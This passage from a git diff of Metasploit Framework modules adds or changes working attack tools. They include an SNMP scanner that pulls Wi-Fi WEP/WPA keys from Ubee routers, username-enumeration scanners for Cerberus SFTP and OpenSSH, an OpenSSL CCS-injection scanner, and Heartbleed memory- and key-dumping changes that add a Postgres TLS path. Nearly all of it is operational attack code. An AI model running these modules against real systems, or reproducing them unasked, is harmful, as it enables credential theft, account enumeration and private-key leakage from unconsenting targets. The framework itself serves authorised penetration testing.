+              actkey = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.1.1.1.12')
+              print_good("Active Wep key is #{actkey}")
+              wifiinfo << "Active WEP key is KEY#: #{actkey}" << "\n"
+
+            else
+              print_line("FAILED")
+            end
+
+          #WPA enabled
+          elsif wifiversion == "2"
+            print_line("Device is configured for WPA ")
+            wpapsk = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.2.2.1.5.12')
+            print_good("WPA PSK: #{wpapsk}")
+            wifiinfo << "WPA PSK: #{wpapsk}" << "\n"
+
+          #WPA2 enabled
+          elsif wifiversion == "3"
+            print_line("Device is configured for WPA2")
+            wpapsk2 = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.2.2.1.5.12')
+            print_good("WPA2 PSK: #{wpapsk2}")
+            wifiinfo << "WPA PSK: #{wpapsk2}" << "\n"
+
+          #WPA Enterprise enabled
+          elsif wifiversion == "4"
+            print_line("Device is configured for WPA enterprise")
+
+          #WPA2 Enterprise enabled
+          elsif wifiversion == "5"
+            print_line("Device is configured for WPA2 enterprise")
+
+          #WEP 802.1x enabled
+          elsif wifiversion == "6"
+            print_line("Device is configured for WEP 802.1X")
+
+          else
+            print_line("FAILED")
+          end
+
+        else
+         print_line("WIFI is not enabled")
+         end
+    end
+     #Woot we got loot.
+     loot_name     = "ubee_wifi"
+     loot_type     = "text/plain"
+     loot_filename = "ubee_wifi.txt"
+     loot_desc     = "Ubee Wifi configuration data"
+     p = store_loot(loot_name, loot_type, datastore['RHOST'], wifiinfo , loot_filename, loot_desc)
+     print_status("WIFI Data saved: #{p}")
+
+     rescue ::SNMP::UnsupportedVersion
+     rescue ::SNMP::RequestTimeout
+     rescue ::Interrupt
+       raise $!
+     rescue ::Exception => e
+       print_error("#{ip} - Error: #{e.class} #{e}")
+     disconnect_snmp
+     end
+  end
+end
diff --git a/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb b/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb
new file mode 100644
index 0000000000..3d5a4f875a
--- /dev/null
+++ b/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb
@@ -0,0 +1,213 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'net/ssh'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Cerberus FTP Server SFTP Username Enumeration',
+      'Description' => %q{
+        This module uses a dictionary to brute force valid usernames from
+        Cerberus FTP server via SFTP.  This issue affects all versions of
+        the software older than 6.0.9.0 or 7.0.0.2 and is caused by a discrepancy
+        in the way the SSH service handles failed logins for valid and invalid
+        users.  This issue was discovered by Steve Embling.
+      },
+      'Author'      => [
+        'Steve Embling', # Discovery
+        'Matt Byrne <attackdebris[at]gmail.com>' # Metasploit module
+      ],
+      'References'     =>
+        [
+          [ 'URL',  'http://xforce.iss.net/xforce/xfdb/93546' ],
+          [ 'BID', '67707']
+        ],
+      'License'     => MSF_LICENSE,
+      'DisclosureDate' => 'May 27 2014'
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(22),
+        OptPath.new(
+          'USER_FILE',
+          [true, 'Files containing usernames, one per line', nil])
+      ], self.class
+    )
+
+    register_advanced_options(
+      [
+        OptInt.new(
+          'RETRY_NUM',
+          [true , 'The number of attempts to connect to a SSH server for each user', 3]),
+        OptInt.new(
+          'SSH_TIMEOUT',
+          [true, 'Specify the maximum time to negotiate a SSH session', 10]),
+        OptBool.new(
+          'SSH_DEBUG',
+          [true, 'Enable SSH debugging output (Extreme verbosity!)', false])
+      ]
+    )
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+
+  def retry_num
+    datastore['RETRY_NUM']
+  end
+
+  def check_vulnerable(ip)
+    options = {
+      :port => rport,
+      :auth_methods  => ['password', 'keyboard-interactive'],
+      :msframework   => framework,
+      :msfmodule     => self,
+      :disable_agent => true,
+      :config        => false,
+      :proxies       => datastore['Proxies']
+    }
+
+    begin
+      transport = Net::SSH::Transport::Session.new(ip, options)
+    rescue Rex::ConnectionError, Rex::AddressInUse
+      return :connection_error
+    end
+
+    auth = Net::SSH::Authentication::Session.new(transport, options)
+    auth.authenticate("ssh-connection", Rex::Text.rand_text_alphanumeric(8), Rex::Text.rand_text_alphanumeric(8))
+    auth_method = auth.allowed_auth_methods.join('|')
+    print_status "#{peer(ip)} Server Version: #{auth.transport.server_version.version}"
+    report_service(
+      :host => ip,
+      :port => rport,
+      :name => "ssh",
+      :proto => "tcp",
+      :info => auth.transport.server_version.version
+    )
+
+    if auth_method.empty?
+      :vulnerable
+    else
+      :safe
+    end
+  end
+
+  def check_user(ip, user, port)
+    pass = Rex::Text.rand_text_alphanumeric(8)
+
+    opt_hash = {
+      :auth_methods  => ['password', 'keyboard-interactive'],
+      :msframework   => framework,
+      :msfmodule     => self,
+      :port          => port,
+      :disable_agent => true,
+      :config        => false,
+      :proxies       => datastore['Proxies']
+    }
+
+    opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+    transport = Net::SSH::Transport::Session.new(ip, opt_hash)
+    auth = Net::SSH::Authentication::Session.new(transport, opt_hash)
+
+    begin
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        auth.authenticate("ssh-connection", user, pass)
+        auth_method = auth.allowed_auth_methods.join('|')
+        if auth_method != ''
+          :success
+        else
+          :fail
+        end
+      end
+    rescue Rex::ConnectionError, Rex::AddressInUse
+      return :connection_error
+    rescue Net::SSH::Disconnect, ::EOFError
+      return :success
+    rescue ::Timeout::Error
+      return :connection_error
+    end
+  end
+
+  def do_report(ip, user, port)
+    report_auth_info(
+      :host   => ip,
+      :port   => rport,
+      :sname  => 'ssh',
+      :user   => user,
+      :active => true
+    )
+  end
+
+  def peer(rhost=nil)
+    "#{rhost}:#{rport} SSH -"
+  end
+
+  def user_list
+    users = nil
+    if File.readable? datastore['USER_FILE']
+      users = File.new(datastore['USER_FILE']).read.split
+      users.each {|u| u.downcase!}
+      users.uniq!
+    else
+      raise ArgumentError, "Cannot read file #{datastore['USER_FILE']}"
+    end
+
+    users
+  end
+
+  def attempt_user(user, ip)
+    attempt_num = 0
+    ret = nil
+
+    while (attempt_num <= retry_num) && (ret.nil? || ret == :connection_error)
+      if attempt_num > 0
+        Rex.sleep(2 ** attempt_num)
+        print_debug "#{peer(ip)} Retrying '#{user}' due to connection error"
+      end
+
+      ret = check_user(ip, user, rport)
+      attempt_num += 1
+    end
+
+    ret
+  end
+
+  def show_result(attempt_result, user, ip)
+    case attempt_result
+    when :success
+      print_good "#{peer(ip)} User '#{user}' found"
+      do_report(ip, user, rport)
+    when :connection_error
+      print_error "#{peer(ip)} User '#{user}' could not connect"
+    when :fail
+      vprint_status "#{peer(ip)} User '#{user}' not found"
+    end
+  end
+
+  def run_host(ip)
+    print_status "#{peer(ip)} Checking for vulnerability"
+    case check_vulnerable(ip)
+    when :vulnerable
+      print_good "#{peer(ip)} Vulnerable"
+      print_status "#{peer(ip)} Starting scan"
+      user_list.each do |user|
+        show_result(attempt_user(user, ip), user, ip)
+      end
+    when :safe
+      print_error "#{peer(ip)} Not vulnerable"
+    when :connection_error
+      print_error "#{peer(ip)} Connection failed"
+    end
+  end
+end
+
diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
new file mode 100644
index 0000000000..374d15b2ca
--- /dev/null
+++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
@@ -0,0 +1,183 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'net/ssh'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::CommandShell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'SSH Username Enumeration',
+      'Description' => %q{
+        This module uses a time-based attack to enumerate users on an OpenSSH server.
+        On some versions of OpenSSH under some configurations, OpenSSH will return a
+        "permission denied" error for an invalid user faster than for a valid user.
+      },
+      'Author'      => ['kenkeiras'],
+      'References'  =>
+       [
+         ['CVE',   '2006-5229'],
+         ['OSVDB', '32721'],
+         ['BID',   '20418']
+       ],
+      'License'     => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(22),
+        OptPath.new('USER_FILE',
+                    [true, 'File containing usernames, one per line', nil]),
+        OptInt.new('THRESHOLD',
+                   [true,
+                   'Amount of seconds needed before a user is considered ' \
+                   'found', 10])
+      ], self.class
+    )
+
+    register_advanced_options(
+      [
+        OptInt.new('RETRY_NUM',
+                   [true , 'The number of attempts to connect to a SSH server' \
+                   ' for each user', 3]),
+        OptInt.new('SSH_TIMEOUT',
+                   [false, 'Specify the maximum time to negotiate a SSH session',
+                   10]),
+        OptBool.new('SSH_DEBUG',
+                    [false, 'Enable SSH debugging output (Extreme verbosity!)',
+                    false])
+      ]
+    )
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+
+  def retry_num
+    datastore['RETRY_NUM']
+  end
+
+  def threshold
+    datastore['THRESHOLD']
+  end
+
+  # Returns true if a nonsense username appears active.
+  def check_false_positive(ip)
+    user = Rex::Text.rand_text_alphanumeric(8)
+    result = attempt_user(user, ip)
+    return(result == :success)
+  end
+
+  def check_user(ip, user, port)
+    pass = Rex::Text.rand_text_alphanumeric(64_000)
+
+    opt_hash = {
+      :auth_methods  => ['password', 'keyboard-interactive'],
+      :msframework   => framework,
+      :msfmodule     => self,
+      :port          => port,
+      :disable_agent => true,
+      :password      => pass,
+      :config        => false,
+      :proxies       => datastore['Proxies']
+    }
+
+    opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+
+    start_time = Time.new
+
+    begin
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        Net::SSH.start(ip, user, opt_hash)
+      end
+    rescue Rex::ConnectionError, Rex::AddressInUse
+      return :connection_error
+    rescue Net::SSH::Disconnect, ::EOFError
+      return :success
+    rescue ::Timeout::Error
+      return :success
+    rescue Net::SSH::Exception
+    end
+
+    finish_time = Time.new
+
+    if finish_time - start_time > threshold
+      :success
+    else
+      :fail
+    end
+  end
+
+  def do_report(ip, user, port)
+    report_auth_info(
+      :host   => ip,
+      :port   => rport,
+      :sname  => 'ssh',
+      :user   => user,
+      :active => true
+    )
+  end
+
+  # Because this isn't using the AuthBrute mixin, we don't have the
+  # usual peer method
+  def peer(rhost=nil)
+    "#{rhost}:#{rport} - SSH -"
+  end
+
+  def user_list
+    if File.readable? datastore['USER_FILE']
+      File.new(datastore['USER_FILE']).read.split
+    else
+      raise ArgumentError, "Cannot read file #{datastore['USER_FILE']}"
+    end
+  end
+
+  def attempt_user(user, ip)
+    attempt_num = 0
+    ret = nil
+
+    while attempt_num <= retry_num and (ret.nil? or ret == :connection_error)
+      if attempt_num > 0
+        Rex.sleep(2 ** attempt_num)
+        print_debug "#{peer(ip)} Retrying '#{user}' due to connection error"
+      end
+
+      ret = check_user(ip, user, rport)
+      attempt_num += 1
+    end
+
+    ret
+  end
+
+  def show_result(attempt_result, user, ip)
+    case attempt_result
+    when :success
+      print_good "#{peer(ip)} User '#{user}' found"
+      do_report(ip, user, rport)
+    when :connection_error
+      print_error "#{peer(ip)} User '#{user}' on could not connect"
+    when :fail
+      print_debug "#{peer(ip)} User '#{user}' not found"
+    end
+  end
+
+  def run_host(ip)
+    print_status "#{peer(ip)} Checking for false positives"
+    if check_false_positive(ip)
+      print_error "#{peer(ip)} throws false positive results. Aborting."
+      return
+    else
+      print_status "#{peer(ip)} Starting scan"
+      user_list.each{ |user| show_result(attempt_user(user, ip), user, ip) }
+    end
+  end
+
+end
diff --git a/modules/auxiliary/scanner/ssl/openssl_ccs.rb b/modules/auxiliary/scanner/ssl/openssl_ccs.rb
new file mode 100644
index 0000000000..bfb7275344
--- /dev/null
+++ b/modules/auxiliary/scanner/ssl/openssl_ccs.rb
@@ -0,0 +1,207 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  CIPHER_SUITES = [
+    0xc014, # TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
+    0xc00a, # TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
+    0xc022, # TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA
+    0xc021, # TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA
+    0x0039, # TLS_DHE_RSA_WITH_AES_256_CBC_SHA
+    0x0038, # TLS_DHE_DSS_WITH_AES_256_CBC_SHA
+    0x0088, # TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
+    0x0087, # TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA
+    0x0087, # TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
+    0xc00f, # TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
+    0x0035, # TLS_RSA_WITH_AES_256_CBC_SHA
+    0x0084, # TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
+    0xc012, # TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
+    0xc008, # TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
+    0xc01c, # TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA
+    0xc01b, # TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA
+    0x0016, # TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
+    0x0013, # TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA
+    0xc00d, # TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
+    0xc003, # TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
+    0x000a, # TLS_RSA_WITH_3DES_EDE_CBC_SHA
+    0xc013, # TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
+    0xc009, # TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
+    0xc01f, # TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA
+    0xc01e, # TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA
+    0x0033, # TLS_DHE_RSA_WITH_AES_128_CBC_SHA
+    0x0032, # TLS_DHE_DSS_WITH_AES_128_CBC_SHA
+    0x009a, # TLS_DHE_RSA_WITH_SEED_CBC_SHA
+    0x0099, # TLS_DHE_DSS_WITH_SEED_CBC_SHA
+    0x0045, # TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
+    0x0044, # TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA
+    0xc00e, # TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
+    0xc004, # TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
+    0x002f, # TLS_RSA_WITH_AES_128_CBC_SHA
+    0x0096, # TLS_RSA_WITH_SEED_CBC_SHA
+    0x0041, # TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
+    0xc011, # TLS_ECDHE_RSA_WITH_RC4_128_SHA
+    0xc007, # TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
+    0xc00c, # TLS_ECDH_RSA_WITH_RC4_128_SHA
+    0xc002, # TLS_ECDH_ECDSA_WITH_RC4_128_SHA
+    0x0005, # TLS_RSA_WITH_RC4_128_SHA
+    0x0004, # TLS_RSA_WITH_RC4_128_MD5
+    0x0015, # TLS_DHE_RSA_WITH_DES_CBC_SHA
+    0x0012, # TLS_DHE_DSS_WITH_DES_CBC_SHA
+    0x0009, # TLS_RSA_WITH_DES_CBC_SHA
+    0x0014, # TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
+    0x0011, # TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA
+    0x0008, # TLS_RSA_EXPORT_WITH_DES40_CBC_SHA
+    0x0006, # TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5
+    0x0003, # TLS_RSA_EXPORT_WITH_RC4_40_MD5
+    0x00ff  # Unknown
+  ]
+
+  HANDSHAKE_RECORD_TYPE = 0x16
+  CCS_RECORD_TYPE       = 0x14
+  ALERT_RECORD_TYPE     = 0x15
+  TLS_VERSION = {
+    'SSLv3' => 0x0300,
+    '1.0'   => 0x0301,
+    '1.1'   => 0x0302,
+    '1.2'   => 0x0303
+  }
+
+  def initialize
+    super(
+      'Name'           => 'OpenSSL Server-Side ChangeCipherSpec Injection Scanner',
+      'Description'    => %q{
+        This module checks for the OpenSSL ChageCipherSpec (CCS)
+        Injection vulnerability. The problem exists in the handling of early
+        CCS messages during session negotation. Vulnerable installations of OpenSSL accepts
+        them, while later implementations do not. If successful, an attacker can leverage this
+        vulnerability to perform a man-in-the-middle (MITM) attack by downgrading the cipher spec
+        between a client and server. This issue was first reported in early June, 2014.
+      },
+      'Author'         => [
+        'Masashi Kikuchi', # Vulnerability discovery
+        'Craig Young <CYoung[at]tripwire.com>', # Original Scanner. This module is based on it.
+        'juan vazquez' # Msf module
+      ],
+      'References'     =>
+        [
+          ['CVE', '2014-0224'],
+          ['URL', 'http://ccsinjection.lepidum.co.jp/'],
+          ['URL', 'http://ccsinjection.lepidum.co.jp/blog/2014-06-05/CCS-Injection-en/index.html'],
+          ['URL', 'http://www.tripwire.com/state-of-security/incident-detection/detection-script-for-cve-2014-0224-openssl-cipher-change-spec-injection/'],
+          ['URL', 'https://www.imperialviolet.org/2014/06/05/earlyccs.html']
+        ],
+      'DisclosureDate' => 'Jun 5 2014',
+      'License'        => MSF_LICENSE
+    )
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptEnum.new('TLS_VERSION', [true, 'TLS/SSL version to use', '1.0', ['SSLv3','1.0', '1.1', '1.2']]),
+        OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10])
+      ], self.class)
+  end
+
+  def peer
+    "#{rhost}:#{rport}"
+  end
+
+  def response_timeout
+    datastore['RESPONSE_TIMEOUT']
+  end
+
+  def run_host(ip)
+    ccs_injection
+  end
+
+  def ccs_injection
+    connect_result = establish_connect
+    return if connect_result.nil?
+
+    vprint_status("#{peer} - Sending CCS...")
+    sock.put(ccs)
+    alert = sock.get_once(-1, response_timeout)
+    if alert.blank?
+      print_good("#{peer} - No alert after invalid CSS message, probably vulnerable")
+      report
+    elsif alert.unpack("C").first == ALERT_RECORD_TYPE
+      vprint_error("#{peer} - Alert record as response to the invalid CCS Message, probably not vulnerable")
+    elsif alert
+      vprint_warning("#{peer} - Unexpected response.")
+    end
+  end
+
+  def report
+    report_vuln({
+      :host => rhost,
+      :port => rport,
+      :name => self.name,
+      :refs => self.references,
+      :info => "Module #{self.fullname} successfully detected CCS injection"
+    })
+  end
+
+  def ccs
+    payload = "\x01" # Change Cipher Spec Message
+
+    ssl_record(CCS_RECORD_TYPE, payload)
+  end
+
+  def client_hello
+    # Use current day for TLS time
+    time_temp = Time.now
+    time_epoch = Time.mktime(time_temp.year, time_temp.month, time_temp.day, 0, 0).to_i
+
+    hello_data = [TLS_VERSION[datastore['TLS_VERSION']]].pack("n") # Version TLS
+    hello_data << [time_epoch].pack("N")    # Time in epoch format
+    hello_data << Rex::Text.rand_text(28)   # Random
+    hello_data << "\x00"                    # Session ID length
+    hello_data << [CIPHER_SUITES.length * 2].pack("n") # Cipher Suites length (102)
+    hello_data << CIPHER_SUITES.pack("n*")  # Cipher Suites
+    hello_data << "\x01"                    # Compression methods length (1)
+    hello_data << "\x00"                    # Compression methods: null
+
+    data = "\x01\x00"                      # Handshake Type: Client Hello (1)
+    data << [hello_data.length].pack("n")  # Length
+    data << hello_data
+
+    ssl_record(HANDSHAKE_RECORD_TYPE, data)
+  end
+
+  def ssl_record(type, data)
+    record = [type, TLS_VERSION[datastore['TLS_VERSION']], data.length].pack('Cnn')
+    record << data
+  end
+
+  def establish_connect
+    connect
+
+    vprint_status("#{peer} - Sending Client Hello...")
+    sock.put(client_hello)
+    server_hello = sock.get(response_timeout)
+
+    unless server_hello
+      vprint_error("#{peer} - No Server Hello after #{response_timeout} seconds...")
+      disconnect
+      return nil
+    end
+
+    unless server_hello.unpack("C").first == HANDSHAKE_RECORD_TYPE
+      vprint_error("#{peer} - Server Hello Not Found")
+      return nil
+    end
+
+    true
+  end
+
+end
+
diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
index 478ac0e3e6..4109ff847d 100644
--- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
+++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
@@ -3,6 +3,12 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+# TODO: Connection reuse: Only connect once and send subsequent heartbleed requests.
+#   We tried it once in https://github.com/rapid7/metasploit-framework/pull/3300
+#   but there were too many errors
+# TODO: Parse the rest of the server responses and return a hash with the data
+# TODO: Extract the relevant functions and include them in the framework
+
 require 'msf/core'
 
 class Metasploit3 < Msf::Auxiliary
@@ -65,9 +71,15 @@ class Metasploit3 < Msf::Auxiliary
     0x00ff  # Unknown
   ]
 
-  HANDSHAKE_RECORD_TYPE = 0x16
-  HEARTBEAT_RECORD_TYPE = 0x18
-  ALERT_RECORD_TYPE     = 0x15
+  HANDSHAKE_RECORD_TYPE             = 0x16
+  HEARTBEAT_RECORD_TYPE             = 0x18
+  ALERT_RECORD_TYPE                 = 0x15
+  HANDSHAKE_SERVER_HELLO_TYPE       = 0x02
+  HANDSHAKE_CERTIFICATE_TYPE        = 0x0b
+  HANDSHAKE_KEY_EXCHANGE_TYPE       = 0x0c
+  HANDSHAKE_SERVER_HELLO_DONE_TYPE  = 0x0e
+
+
   TLS_VERSION = {
     'SSLv3' => 0x0300,
     '1.0'   => 0x0301,
@@ -80,7 +92,8 @@ class Metasploit3 < Msf::Auxiliary
     'IMAP'   => :tls_imap,
     'JABBER' => :tls_jabber,
     'POP3'   => :tls_pop3,
-    'FTP'    => :tls_ftp
+    'FTP'    => :tls_ftp,
+    'POSTGRES'   => :tls_postgres
   }
 
   # See the discussion at https://github.com/rapid7/metasploit-framework/pull/3252
@@ -111,7 +124,8 @@ class Metasploit3 < Msf::Auxiliary
         'Sebastiano Di Paola', # Msf module
         'Tom Sellers', # Msf module
         'jjarmoc', #Msf module; keydump, refactoring..
-        'Ben Buchanan' #Msf module
+        'Ben Buchanan', #Msf module
+        'herself' #Msf module
       ],
       'References'     =>
         [
@@ -137,9 +151,9 @@ class Metasploit3 < Msf::Auxiliary
     register_options(
       [
         Opt::RPORT(443),
-        OptEnum.new('TLS_CALLBACK', [true, 'Protocol to use, "None" to use raw TLS sockets', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP' ]]),
+        OptEnum.new('TLS_CALLBACK', [true, 'Protocol to use, "None" to use raw TLS sockets', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP', 'POSTGRES' ]]),
         OptEnum.new('TLS_VERSION', [true, 'TLS/SSL version to use', '1.0', ['SSLv3','1.0', '1.1', '1.2']]),
-        OptInt.new('MAX_KEYTRIES', [true, 'Max tries to dump key', 10]),
+        OptInt.new('MAX_KEYTRIES', [true, 'Max tries to dump key', 50]),
         OptInt.new('STATUS_EVERY', [true, 'How many retries until status', 5]),
         OptRegexp.new('DUMPFILTER', [false, 'Pattern to filter leaked memory before storing', nil]),
         OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10])
@@ -148,11 +162,20 @@ class Metasploit3 < Msf::Auxiliary
     register_advanced_options(
       [
         OptInt.new('HEARTBEAT_LENGTH', [true, 'Heartbeat length', 65535]),
-        OptString.new('XMPPDOMAIN', [ true, 'The XMPP Domain to use when Jabber is selected', 'localhost' ])
+        OptString.new('XMPPDOMAIN', [true, 'The XMPP Domain to use when Jabber is selected', 'localhost'])
       ], self.class)
 
   end
 
+  def peer
+    "#{rhost}:#{rport}"
+  end
+
+  #
+  # Main methods
+  #
+
+  # Called when using check
   def check_host(ip)
     @check_only = true
     vprint_status "#{peer} - Checking for Heartbleed exposure"
@@ -163,20 +186,48 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
+  # Main method
   def run
     if heartbeat_length > 65535 || heartbeat_length < 0
-      print_error("HEARTBEAT_LENGTH should be a natural number less than 65536")
+      print_error('HEARTBEAT_LENGTH should be a natural number less than 65536')
       return
     end
 
     if response_timeout < 0
-      print_error("RESPONSE_TIMEOUT should be bigger than 0")
+      print_error('RESPONSE_TIMEOUT should be bigger than 0')
       return
     end
 
     super
   end
 
+  # Main method
+  def run_host(ip)
+    # initial connect to get public key and stuff
+    connect_result = establish_connect
+    disconnect
+    return if connect_result.nil?
+
+    case action.name
+      when 'SCAN'
+        loot_and_report(bleed)
+      when 'DUMP'
+        loot_and_report(bleed)  # Scan & Dump are similar, scan() records results
+      when 'KEYS'
+        getkeys
+      else
+        #Shouldn't get here, since Action is Enum
+        print_error("Unknown Action: #{action.name}")
+    end
+
+    # ensure all connections are closed
+    disconnect
+  end
+
+  #
+  # DATASTORE values
+  #
+
   # If this is merely a check, set to the RFC-defined
   # maximum padding length of 2^14. See:
   # https://tools.ietf.org/html/rfc6520#section-4
@@ -185,53 +236,93 @@ class Metasploit3 < Msf::Auxiliary
     if @check_only
       SAFE_CHECK_MAX_RECORD_LENGTH
     else
-      datastore["HEARTBEAT_LENGTH"]
+      datastore['HEARTBEAT_LENGTH']
     end
   end
 
-  def peer
-    "#{rhost}:#{rport}"
-  end
-
   def response_timeout
     datastore['RESPONSE_TIMEOUT']
   end
 
+  def tls_version
+    datastore['TLS_VERSION']
+  end
+
+  def dumpfilter
+    datastore['DUMPFILTER']
+  end
+
+  def max_keytries
+    datastore['MAX_KEYTRIES']
+  end
+
+  def xmpp_domain
+    datastore['XMPPDOMAIN']
+  end
+
+  def status_every
+    datastore['STATUS_EVERY']
+  end
+
+  def tls_callback
+    datastore['TLS_CALLBACK']
+  end
+
+  #
+  # TLS Callbacks
+  #
+
   def tls_smtp
     # https://tools.ietf.org/html/rfc3207
-    sock.get_once(-1, response_timeout)
+    get_data
     sock.put("EHLO #{Rex::Text.rand_text_alpha(10)}\r\n")
-    res = sock.get_once(-1, response_timeout)
+    res = get_data
 
     unless res && res =~ /STARTTLS/
       return nil
     end
     sock.put("STARTTLS\r\n")
-    sock.get_once(-1, response_timeout)
+    get_data
   end
 
   def tls_imap
     # http://tools.ietf.org/html/rfc2595
-    sock.get_once(-1, response_timeout)
+    get_data
     sock.put("a001 CAPABILITY\r\n")
-    res = sock.get_once(-1, response_timeout)
+    res = get_data
     unless res && res =~ /STARTTLS/i
       return nil
     end
     sock.put("a002 STARTTLS\r\n")
-    sock.get_once(-1, response_timeout)
+    get_data
+  end
+
+  def tls_postgres
+    # postgresql TLS - works with all modern pgsql versions - 8.0 - 9.3
+    # http://www.postgresql.org/docs/9.3/static/protocol-message-formats.html
+    get_data
+    # the postgres SSLRequest packet is a int32(8) followed by a int16(1234),
+    # int16(5679) in network format
+    psql_sslrequest = [8].pack('N')
+    psql_sslrequest << [1234, 5679].pack('n*')
+    sock.put(psql_sslrequest)
+    res = get_data
+    unless res && res =~ /S/
+      return nil
+    end
+    res
   end
 
   def tls_pop3
     # http://tools.ietf.org/html/rfc2595
-    sock.get_once(-1, response_timeout)
+    get_data
     sock.put("CAPA\r\n")
-    res = sock.get_once(-1, response_timeout)
+    res = get_data
     if res.nil? || res =~ /^-/ || res !~ /STLS/
       return nil
     end
     sock.put("STLS\r\n")
-    res = sock.get_once(-1, response_timeout)
+    res = get_data
     if res.nil? || res =~ /^-/
       return nil
     end
@@ -247,13 +338,13 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def tls_jabber
-    sock.put(jabber_connect_msg(datastore['XMPPDOMAIN']))
+    sock.put(jabber_connect_msg(xmpp_domain))
     res = sock.get(response_timeout)
     if res && res.include?('host-unknown')
       jabber_host = res.match(/ from='([\w.]*)' /)
       if jabber_host && jabber_host[1]
         disconnect
-        connect
+        establish_connect
         vprint_status("#{peer} - Connecting with autodetected remote XMPP hostname: #{jabber_host[1]}...")
         sock.put(jabber_connect_msg(jabber_host[1]))
         res = sock.get(response_timeout)
@@ -275,7 +366,7 @@ class Metasploit3 < Msf::Auxiliary
     res = sock.get(response_timeout)
     return nil if res.nil?
     sock.put("AUTH TLS\r\n")
-    res = sock.get_once(-1, response_timeout)
+    res = get_data
     return nil if res.nil?
     if res !~ /^234/
       # res contains the error message
@@ -285,31 +376,83 @@ class Metasploit3 < Msf::Auxiliary
     res
   end
 
-  def run_host(ip)
-    case action.name
-    when 'SCAN'
-      loot_and_report(bleed)
-    when 'DUMP'
-      loot_and_report(bleed)  # Scan & Dump are similar, scan() records results
-    when 'KEYS'
-      getkeys()
-    else
-      #Shouldn't get here, since Action is Enum
-      print_error("Unknown Action: #{action.name}")
-      return
+  #
+  # Helper Methods
+  #
+
+  # Get data from the socket
+  # this ensures the requested length is read (if available)
+  def get_data(length = -1)
+
+    return sock.get_once(-1, response_timeout) if length == -1
+
+    to_receive = length
+    data = ''
+    while to_receive > 0
+      temp = sock.get_once(to_receive, response_timeout)
+      break if temp.nil?
+
+      data << temp
+      to_receive -= temp.length
     end
+    data
   end
 
+  def to_hex_string(data)
